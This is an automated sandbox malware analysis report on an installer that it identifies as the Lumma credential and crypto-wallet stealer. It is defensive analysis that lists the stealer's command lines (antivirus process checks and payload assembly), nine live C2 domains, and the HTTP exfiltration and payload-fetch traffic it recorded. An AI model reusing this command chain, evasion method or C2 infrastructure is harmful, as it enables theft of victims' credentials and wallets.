Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
installer_1.05_37.4.exe

Overview

General Information

Sample name:installer_1.05_37.4.exe
Analysis ID:1589445
MD5:a2e9824e77be1fbc29913ffd0b324823
SHA1:42dd1e05ec49639d9d8ad318e732a66a1451fd6f
SHA256:34c3a5d70230d93968cc2db047398cef644fb500740bbc20d09feb8e754ae197
Tags:AutoITexeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • installer_1.05_37.4.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\installer_1.05_37.4.exe" MD5: A2E9824E77BE1FBC29913FFD0B324823)
    • cmd.exe (PID: 7440 cmdline: "C:\Windows\System32\cmd.exe" /c move Unexpected Unexpected.cmd & Unexpected.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7528 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7536 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7572 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7580 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7616 cmdline: cmd /c md 224553 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7632 cmdline: extrac32 /Y /E Choosing MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7648 cmdline: findstr /V "Readily" Departure MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7664 cmdline: cmd /c copy /b 224553\Luther.com + Remote + Priorities + Cho + Reliability + Rating + Dot + Holocaust + Page + Webshots 224553\Luther.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7680 cmdline: cmd /c copy /b ..\Crowd + ..\Leone + ..\Tutorial + ..\Architect + ..\Mutual + ..\Margin + ..\Many z MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Luther.com (PID: 7696 cmdline: Luther.com z MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 7712 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["kickykiduz.lat", "goldyhanders.cyou", "leggelatez.lat", "bloodyswif.lat", "washyceehsu.lat", "miniatureyu.lat", "shoefeatthe.lat", "savorraiykj.lat", "finickypwk.lat"], "Build id": "jMw1IE--psyche"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000D.00000003.2260009291.000000000391B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0000000D.00000003.2259044723.000000000391B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 10 entries

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Unexpected Unexpected.cmd & Unexpected.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7440, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7580, ProcessName: findstr.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-12T15:29:17.263917+010020283713Unknown Traffic192.168.2.549716104.21.16.1443TCP
                2025-01-12T15:29:18.227891+010020283713Unknown Traffic192.168.2.549722104.21.16.1443TCP
                2025-01-12T15:29:19.750416+010020283713Unknown Traffic192.168.2.549733104.21.16.1443TCP
                2025-01-12T15:29:20.991355+010020283713Unknown Traffic192.168.2.549744104.21.16.1443TCP
                2025-01-12T15:29:22.293507+010020283713Unknown Traffic192.168.2.549750104.21.16.1443TCP
                2025-01-12T15:29:23.841317+010020283713Unknown Traffic192.168.2.549761104.21.16.1443TCP
                2025-01-12T15:29:24.834074+010020283713Unknown Traffic192.168.2.549772104.21.16.1443TCP
                2025-01-12T15:29:25.839532+010020283713Unknown Traffic192.168.2.549777104.21.16.1443TCP
                2025-01-12T15:29:27.167828+010020283713Unknown Traffic192.168.2.549782185.161.251.21443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-12T15:29:17.745513+010020546531A Network Trojan was detected192.168.2.549716104.21.16.1443TCP
                2025-01-12T15:29:18.651191+010020546531A Network Trojan was detected192.168.2.549722104.21.16.1443TCP
                2025-01-12T15:29:26.328028+010020546531A Network Trojan was detected192.168.2.549777104.21.16.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-12T15:29:17.745513+010020498361A Network Trojan was detected192.168.2.549716104.21.16.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-12T15:29:18.651191+010020498121A Network Trojan was detected192.168.2.549722104.21.16.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-12T15:29:20.352768+010020480941Malware Command and Control Activity Detected192.168.2.549733104.21.16.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://cegu.shop/xAvira URL Cloud: Label: malware
                Source: https://cegu.shop/8574262446/ph.txt#Avira URL Cloud: Label: malware
                Source: https://cegu.shop/SAvira URL Cloud: Label: malware
                Source: https://cegu.shop/8574262446/ph.txt?Avira URL Cloud: Label: malware
                Source: https://cegu.shop/8574262446/ph.txtebKit/537.36Avira URL Cloud: Label: malware
                Source: https://goldyhanders.cyou/apiAvira URL Cloud: Label: malware
                Source: https://cegu.shop:443/8574262446/ph.txtoftAvira URL Cloud: Label: malware
                Source: https://goldyhanders.cyou:443/apiAvira URL Cloud: Label: malware
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["kickykiduz.lat", "goldyhanders.cyou", "leggelatez.lat", "bloodyswif.lat", "washyceehsu.lat", "miniatureyu.lat", "shoefeatthe.lat", "savorraiykj.lat", "finickypwk.lat"], "Build id": "jMw1IE--psyche"}
                Source: installer_1.05_37.4.exeVirustotal: Detection: 13%Perma Link
                Source: installer_1.05_37.4.exeReversingLabs: Detection: 23%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.7% probability
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString decryptor: finickypwk.lat
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString decryptor: shoefeatthe.lat
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString decryptor: savorraiykj.lat
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString decryptor: kickykiduz.lat
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString decryptor: miniatureyu.lat
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString decryptor: leggelatez.lat
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString decryptor: washyceehsu.lat
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString decryptor: bloodyswif.lat
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString decryptor: goldyhanders.cyou
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmpString decryptor: jMw1IE--psyche
                Source: installer_1.05_37.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49744 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49761 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49772 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49777 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49782 version: TLS 1.2
                Source: installer_1.05_37.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                Source: C:\Users\user\Desktop\installer_1.05_37.4.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E9DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00E9DC54
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EAA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00EAA087
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EAA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00EAA1E2
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E9E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,13_2_00E9E472
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EAA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00EAA570
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EA66DC FindFirstFileW,FindNextFileW,FindClose,13_2_00EA66DC
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E6C622 FindFirstFileExW,13_2_00E6C622
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EA73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,13_2_00EA73D4
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EA7333 FindFirstFileW,FindClose,13_2_00EA7333
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00E9D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00E9D921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\224553Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\224553\Jump to behavior

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49716 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49733 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49716 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49722 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49722 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49777 -> 104.21.16.1:443
                Source: Malware configuration extractorURLs: kickykiduz.lat
                Source: Malware configuration extractorURLs: goldyhanders.cyou
                Source: Malware configuration extractorURLs: leggelatez.lat
                Source: Malware configuration extractorURLs: bloodyswif.lat
                Source: Malware configuration extractorURLs: washyceehsu.lat
                Source: Malware configuration extractorURLs: miniatureyu.lat
                Source: Malware configuration extractorURLs: shoefeatthe.lat
                Source: Malware configuration extractorURLs: savorraiykj.lat
                Source: Malware configuration extractorURLs: finickypwk.lat
                Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49750 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49772 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49733 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49744 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49777 -> 104.21.16.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49782 -> 185.161.251.21:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49761 -> 104.21.16.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: goldyhanders.cyou
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: goldyhanders.cyou
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=87R2HP2T24FSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12800Host: goldyhanders.cyou
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L6787UKPDE0UG5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15054Host: goldyhanders.cyou
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U1G1WYDNMWQDLVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20544Host: goldyhanders.cyou
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SNQRJQPDJYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1337Host: goldyhanders.cyou
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AQP4E5FX5O04User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1081Host: goldyhanders.cyou
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: goldyhanders.cyou
                Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Local\Temp\224553\Luther.comCode function: 13_2_00EAD889 InternetReadFile,SetEvent,GetLastError,SetEvent,13_2_00EAD889
                Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
                Source: global trafficDNS traffic detected: DNS query: jIUAzCVEKkxMKZXfO.jIUAzCVEKkxMKZXfO
                Source: global trafficDNS traffic detected: DNS query: goldyhanders.cyou
                Source: global trafficDNS traffic detected: DNS query: cegu.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: goldyhanders.cyou
                Source: installer_1.05_37.4.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: installer_1.05_37.4.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: installer_1.05_37.4.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: installer_1.05_37.4.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: installer_1.05_37.4.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: installer_1.05_37.4.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: installer_1.05_37.4.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: installer_1.05_37.4.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: installer_1.05_37.4.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: installer_1.05_37.4.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmp, installer_1.05_37.4.exeString found in binary or memory: http://ocsp.digicert.com0
                Source: installer_1.05_37.4.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: installer_1.05_37.4.exeString found in binary or memory: http://ocsp.digicert.com0C
                Source: installer_1.05_37.4.exeString found in binary or memory: http://ocsp.digicert.com0X
                Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: Luther.com, 0000000D.00000003.2271884207.00000000038D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: Luther.com, 0000000D.00000003.2221201231.0000000003DCC000.00000004.00000800.00020000.00000000.sdmp, Webshots.9.dr, Luther.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
